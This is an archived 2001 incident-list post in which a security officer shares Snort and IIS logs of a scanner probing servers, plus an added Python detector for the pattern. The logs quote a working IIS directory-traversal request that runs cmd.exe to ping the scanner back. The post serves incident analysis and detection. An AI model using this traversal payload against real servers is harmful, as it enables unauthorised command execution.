I don't think this is a worm. I think this is most probably a black-hat scanning technique. Note the command the scanner attempted to execute. A single ping-back to the scanning machine. This would allow the scanner to easily generate a list of vulnerable boxen.

Attached are intrusion detection system and webserver logs in EST.

Jul 27 11:02:30 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2724 -> Pub.IP.Address:80
Jul 27 11:02:34 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2828 -> Pub.IP.Address:80
Jul 27 11:02:37 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2927 -> Pub.IP.Address:80
Jul 27 11:02:45 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2724 -> Pub.IP.Address:80
Jul 27 11:02:55 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2924 -> Pub.IP.Address:80
Jul 27 11:03:10 stonegate snort: IIS-command-execution-attempt: 24.41.72.83:2924 -> Pub.IP.Address:80

2001-07-27 11:02:39 24.41.72.83 - Private.IP.Address 80 8r?@?GET /scripts/..%5c..%5cwi nnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -
2001-07-27 11:02:56 24.41.72.83 - Private.IP.Address 80 8r?@?GET /scripts/..%5c..%5cwi nnt/system32/cmd.exe /c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -

Keith T. Morgan
Chief of Information Security
Terradon Communications
keith.morganat_private
304-755-8291 x142

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Sun Jul 29 2001 - 09:22:01 PDT
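
Added example, not part of the original post: a log triage sketch for the pattern the post describes, flagging web-log requests where cmd.exe is asked to ping the same address the request came from. The function names and verdict labels are assumptions of this example; the first sample line is the request quoted in the post and the other two are constructed.

```python
import re
from urllib.parse import unquote_plus

# Line 1 is the request quoted in the post, verbatim (including the
# mail-wrap space and stray bytes); lines 2 and 3 are constructed samples.
SAMPLE_LOG = [
    "2001-07-27 11:02:39 24.41.72.83 - Private.IP.Address 80 8r?@?GET "
    "/scripts/..%5c..%5cwi nnt/system32/cmd.exe "
    "/c+ping+-n+1+-l+128+-w+1+24.41.72.83 501 -",
    "2001-07-27 11:09:12 192.0.2.44 - Private.IP.Address 80 GET "
    "/scripts/..%5c..%5cwinnt/system32/cmd.exe "
    "/c+ping+-n+1+203.0.113.9 501 -",
    "2001-07-27 11:10:00 198.51.100.7 - Private.IP.Address 80 GET "
    "/index.html - 200 -",
]

IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"
# Leading fields of the log layout shown in the post: date, time, client IP.
HEAD = re.compile(rf"^(\S+ \S+) ({IPV4}) ")
# First IPv4 address that follows a ping command in the decoded request.
PING = re.compile(rf"\bping\b.*?({IPV4})", re.I)


def classify(line):
    """Return (client_ip, verdict, ping_target), or None if unparseable."""
    m = HEAD.match(line)
    if not m:
        return None
    client = m.group(2)
    # Decode %5c and '+' so the path and arguments appear in plain form.
    rest = unquote_plus(line[m.end():])
    if "cmd.exe" not in rest.lower():
        return (client, "no-cmd-exec", None)
    p = PING.search(rest)
    if p is None:
        return (client, "command-exec", None)
    target = p.group(1)
    verdict = "ping-back-to-source" if target == client else "ping-third-party"
    return (client, verdict, target)


def scan_sources(lines):
    """Sorted client IPs whose requests asked the server to ping them back."""
    hits = (classify(line) for line in lines)
    return sorted({h[0] for h in hits if h and h[1] == "ping-back-to-source"})


if __name__ == "__main__":
    for src in scan_sources(SAMPLE_LOG):
        print("ping-back scan from", src)
```
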